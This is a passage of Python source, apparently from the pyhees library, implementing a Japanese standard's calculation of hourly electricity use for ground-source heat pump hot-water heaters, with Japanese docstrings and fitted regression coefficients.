1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = np.max(L_H_x) return L_max_H def get_L_max_C(L_CS_x_t_i, L_CL_x_t_i): """1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) Args: L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) Returns: float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d) """ # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_CS_x_t = np.sum(L_CS_x_t_i, axis=0) L_CL_x_t = np.sum(L_CL_x_t_i, axis=0) # L_CS_x_tとL_CL_x_tの要素同士を足す L_C_x_t = L_CS_x_t + L_CL_x_t # 1次元配列を2次元配列に形状変換する L_C_x_t = np.reshape(L_C_x_t, (365, 24)) # 時間軸合算 L_C_x = np.sum(L_C_x_t, axis=1) # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = np.max(L_C_x) return L_max_C
# ============================================================================ # 付録 N 地中熱ヒートポンプ温水暖房機 # ============================================================================ import numpy as np from pyhees.section4_7_common import get_Q_out_H_hs_d_t from pyhees.section4_8_a import calc_e_ref_H_th import pyhees.section4_7_h as appendix_H # ============================================================================ # N3. 暖房エネルギー消費量 # ============================================================================ # ============================================================================ # N.3.1 消費電力量 # ============================================================================ def calc_E_E_hs_d_t(Q_dmd_H_hs_d_t, Theta_ex_a_Ave, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_SW_d_t, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1) Args: Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_SW_d_t(ndarray): 往き温水温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16) q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 温水暖房用熱源機内の平均放熱損失 ---------- # 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9) q_loss_H_hs_d_t = get_q_loss_H_hs_d_t() # ---------- 温水暖房用熱源機の平均暖房出力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) Q_max_H_hs_d_t = calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType) # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) q_out_H_hs_d_t = get_q_out_H_hs_d_t(Q_out_H_hs_d_t) # ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ---------- # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA) # ---------- 補機の消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) E_aux_hs_d_t = calc_E_aux_hs_d_t(qr_out_H_hs_d_t) # ---------- ポンプの消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a) E_pump_gsRW_d_t = calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a) E_pump_SW_d_t = calc_E_pump_SW_d_t(qr_out_H_hs_d_t) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (kWh/h) (8) E_pump_hs_d_t = get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t) # ---------- 圧縮機の消費電力量 ---------- # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(7a) Theta_ref_SH_d_t = calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(6a) Theta_ref_SC_d_t = calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Theta_ref_cnd_d_t = calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a) Theta_ref_evp_d_t = calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d) # 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a) Mu_d_t = calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2) E_comp_hs_d_t, _ = get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t) # ---------- 熱源機の消費電力量 ---------- # 1時間当たりの熱源機の消費電力量 (kWh/h) (1) E_E_hs_d_t = E_comp_hs_d_t + E_pump_hs_d_t + E_aux_hs_d_t E_E_hs_d_t[q_out_H_hs_d_t == 0] = 0 return E_E_hs_d_t # ============================================================================ # N.3.2 ガス消費量 # ============================================================================ def get_E_G_hs_d_t(): """熱源機のガス消費量 Args: Returns: ndarray: 熱源機のガス消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.3 灯油消費量 # ============================================================================ def get_E_K_hs_d_t(): """熱源機の灯油消費量 Args: Returns: ndarray: 熱源機の灯油消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.3.4 その他の一次エネルギー消費量 # ============================================================================ def get_E_M_hs_d_t(): """熱源機のその他の燃料の一次エネルギー消費量 Args: Returns: ndarray: 熱源機のその他の燃料の一次エネルギー消費量 """ return np.zeros(24 * 365) # ============================================================================ # N.4 圧縮機の消費電力量 # ============================================================================ def get_E_comp_hs_d_t(qr_out_H_hs_d_t, q_out_H_hs_d_t, q_loss_H_hs_d_t, Mu_d_t, Theta_ref_evp_d_t, Theta_ref_cnd_d_t): """日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_out_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 q_loss_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Mu_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Returns: ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 """ # 圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c) k_comp_a = -0.7309 k_comp_b = 0.67 k_comp_c = 1.0319 # 日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b) f_comp_act_d_t = np.clip(k_comp_a * qr_out_H_hs_d_t + (1 - k_comp_a * k_comp_b), 1, None) * k_comp_c # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a) E_comp_hs_d_t = f_comp_act_d_t * ((q_out_H_hs_d_t + q_loss_H_hs_d_t) / Mu_d_t) E_comp_hs_d_t[Theta_ref_evp_d_t >= Theta_ref_cnd_d_t] = 0 return E_comp_hs_d_t, f_comp_act_d_t def calc_Mu_d_t(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t): """日付dの時刻tにおける圧縮機の圧縮効率 (3a) Args: Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃) Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃) Returns: ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a) """ # Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_0 = get_K_Mu_h_0() # Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_1 = get_K_Mu_h_1() # Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) K_Mu_h_2 = get_K_Mu_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1) e_ref_H_th_d_t = calc_e_ref_H_th(Theta_ref_evp_d_t, Theta_ref_cnd_d_t, Theta_ref_SC_d_t, Theta_ref_SH_d_t) # 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Mu_d_t = K_Mu_h_2 * (e_ref_H_th_d_t ** 2) + K_Mu_h_1 * e_ref_H_th_d_t + K_Mu_h_0 Mu_d_t[e_ref_H_th_d_t > 10] = K_Mu_h_2 * (10 ** 2) + K_Mu_h_1 * 10 + K_Mu_h_0 return Mu_d_t def get_K_Mu_h_0(): """Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return -0.430363368361459 def get_K_Mu_h_1(): """Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.698531770387591 def get_K_Mu_h_2(): """Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) """ return 0.0100164335768507 def calc_Theta_ref_evp_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) """ # Kevph0:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_0 = get_K_evp_h_0() # Kevph1:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_1 = get_K_evp_h_1() # Kevph2:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_2 = get_K_evp_h_2() # Kevph12:蒸発温度を計算する式の係数 (-) (4b) K_evp_h_12 = get_K_evp_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Theta_ref_evp_d_t = np.clip(K_evp_h_0 + K_evp_h_1 * np.repeat(Theta_gsRW_d_ave_d, 24) + K_evp_h_2 * qr_out_H_hs_d_t + K_evp_h_12 * np.repeat(Theta_gsRW_d_ave_d, 24) * qr_out_H_hs_d_t, -50, None) return Theta_ref_evp_d_t def get_K_evp_h_0(): """Kevph0:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph0:蒸発温度を計算する式の係数 """ return -2.95315205817646 def get_K_evp_h_1(): """Kevph1:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph1:蒸発温度を計算する式の係数 """ return 0.915893610614308 def get_K_evp_h_2(): """Kevph2:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph2:蒸発温度を計算する式の係数 """ return -11.8319776584846 def get_K_evp_h_12(): """Kevph12:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph12:蒸発温度を計算する式の係数 """ return 0.29704275467947 def calc_Theta_ref_cnd_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) Args: qr_out_H_hs_d_t(param Theta_SW_d_t: 日付dの時刻tにおける往き温水温度(℃)): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 日付dの時刻tにおける往き温水温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃) """ # Kcndh0:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_0 = get_K_cnd_h_0() # Kcndh1:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_1 = get_K_cnd_h_1() # Kcndh2:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_2 = get_K_cnd_h_2() # Kcndh12:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_12 = get_K_cnd_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a) Theta_ref_cnd_d_t = np.clip(K_cnd_h_0 + K_cnd_h_1 * Theta_SW_d_t + K_cnd_h_2 * qr_out_H_hs_d_t + K_cnd_h_12 * Theta_SW_d_t * qr_out_H_hs_d_t, None, 65) return Theta_ref_cnd_d_t def get_K_cnd_h_0(): """Kcndh0:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh0:凝縮温度を計算する式の係数 """ return 3.6105623002886 def get_K_cnd_h_1(): """Kcndh1:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh1:凝縮温度を計算する式の係数 """ return 0.930136847064537 def get_K_cnd_h_2(): """Kcndh2:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh2:凝縮温度を計算する式の係数 """ return 0.494024927234563 def get_K_cnd_h_12(): """Kcndh12:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: ndarray: Kcndh12:凝縮温度を計算する式の係数 """ return 0.00770898511188855 def calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 往き温水温度 (℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) """ # Ksch0:過冷却度を計算する式の係数 (-) (6b) K_sc_h_0 = get_K_sc_h_0() # Ksch1:過冷却度を計算する式の係数 (-) (6b) K_sc_h_1 = get_K_sc_h_1() # Ksch2:過冷却度を計算する式の係数 (-) (6b) K_sc_h_2 = get_K_sc_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a) Theta_ref_SC_d_t = np.clip(K_sc_h_0 + K_sc_h_1 * Theta_SW_d_t + K_sc_h_2 * qr_out_H_hs_d_t, 0, None) return Theta_ref_SC_d_t def get_K_sc_h_0(): """Ksch0:過冷却度を計算する式の係数(-) (6b) Args: Returns: float: Ksch0:過冷却度を計算する式の係数(-) (6b) """ return -4.02655782981397 def get_K_sc_h_1(): """Ksch1:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch1:過冷却度を計算する式の係数 """ return 0.0894330494418674 def get_K_sc_h_2(): """Ksch2:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch2:過冷却度を計算する式の係数 """ return 14.3457831669162 def calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) """ # Kshh0:過熱度を計算する式の係数 (-) (7b) K_sh_h_0 = get_K_sh_h_0() # Kshh1:過熱度を計算する式の係数 (-) (7b) K_sh_h_1 = get_K_sh_h_1() # Kshh2:過熱度を計算する式の係数 (-) (7b) K_sh_h_2 = get_K_sh_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a) Theta_ref_SC_d_t = np.clip(K_sh_h_0 + K_sh_h_1 * qr_out_H_hs_d_t + K_sh_h_2 * np.repeat(Theta_gsRW_d_ave_d, 24), 0, None) return Theta_ref_SC_d_t def get_K_sh_h_0(): """Kshh0:過熱度を計算する式の係数(-) (7b) Args: Returns: float: Kshh0:過熱度を計算する式の係数 """ return 0.819643791668597 def get_K_sh_h_1(): """Kshh1:過熱度を計算する式の係数 (-) (7b) Args: Returns: float: Kshh1:過熱度を計算する式の係数 (-) """ return 2.99282570323758 def get_K_sh_h_2(): """Kshh2:過熱度を計算する式の係数 (-) (7b) Args: Returns: Kshh2:過熱度を計算する式の係数 (-) """ return -0.0762659183765636 # ============================================================================ # N.5 ポンプの消費電力量 # ============================================================================ def get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t): """日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) Args: E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h) """ # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) E_pump_hs_d_t = E_pump_SW_d_t + E_pump_gsRW_d_t return E_pump_hs_d_t def calc_E_pump_SW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) """ # apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) a_pump_SW = get_a_pump_SW() # bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) b_pump_SW = get_b_pump_SW() # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) E_pump_SW_d_t = a_pump_SW * qr_out_H_hs_d_t + b_pump_SW * (qr_out_H_hs_d_t ** 2) return E_pump_SW_d_t def get_a_pump_SW(): """apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.041972403 def get_b_pump_SW(): """bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.104478967 def calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) """ # apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) a_pump_gsRW = get_a_pump_gsRW() # bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) b_pump_gsRW = get_b_pump_gsRW() # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) E_pump_gsRW_d_t = a_pump_gsRW * qr_out_H_hs_d_t + b_pump_gsRW * (qr_out_H_hs_d_t ** 2) return E_pump_gsRW_d_t def get_a_pump_gsRW(): """apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.062196275 def get_b_pump_gsRW(): """bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.071756474 # ============================================================================ # N.6 補機の消費電力量 # ============================================================================ def calc_E_aux_hs_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) """ # kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) kauxh0 = get_kauxh0() # kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) kauxh1 = get_kauxh1() # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a) E_aux_hs_d_t = kauxh1 * qr_out_H_hs_d_t + kauxh0 return E_aux_hs_d_t def get_kauxh0(): """kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh0:補機の消費電力量を計算する式の係数 (-) """ return 0.0433205551083371 def get_kauxh1(): """kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh1:補機の消費電力量を計算する式の係数 (-) """ return 0.0173758330059922 # ============================================================================ # N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率 # ============================================================================ def get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA): """日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) Args: q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_max_H_hs_JRA(ndarray): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) """ # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = (q_out_H_hs_d_t * 10 ** 3) / q_max_H_hs_JRA return qr_out_H_hs_d_t # ============================================================================ # N.8 温水暖房用熱源機の平均暖房出力 # ============================================================================ def get_q_out_H_hs_d_t(Q_out_H_hs_d_t): """日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) Args: Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13) q_out_H_hs_d_t = Q_out_H_hs_d_t / 3600 * 10 ** 3 return q_out_H_hs_d_t def get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Args: Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h) Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(14) return np.min([Q_dmd_H_hs_d_t, Q_max_H_hs_d_t], axis=0) def calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15) Args: Theta_SW_d_t(ndarray): 往き温水温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ---------- q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ---------- Q_max_H_hs_d_t = (-0.005635139785329 * Theta_SW_d_t + 0.0258983299329793 * np.clip(np.repeat(Theta_gsRW_d_ave_d, 24), 0, 20) + 0.836930642418471) * q_max_H_hs_JRA * 3600 * 10 ** (-6) return Q_max_H_hs_d_t # ============================================================================ # N.9 温水暖房用熱源機内の平均放熱損失 # ============================================================================ def get_q_loss_H_hs_d_t(): """日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) Args: Returns: float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) """ return 0 # ============================================================================ # N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 # ============================================================================ def calc_q_max_H_hs_JRA(q_max_hs): """地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) Args: q_max_hs(return: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)): 熱源機の最大暖房能力 ⒲ Returns: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) """ # 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) f_crated = get_f_crated() # 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16) q_max_H_hs_JRA = q_max_hs * f_crated return q_max_H_hs_JRA def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh): """温水暖房用熱源機の定格能力 Args: region(int): 省エネルギー地域区分 A_A(float): 床面積の合計 (m2) A_MR(float): 主たる居室の床面積 (m2) A_OR(float): その他の居室の床面積 (m2) mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は' mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は' has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue Returns: float: 温水暖房用熱源機の定格能力 """ # 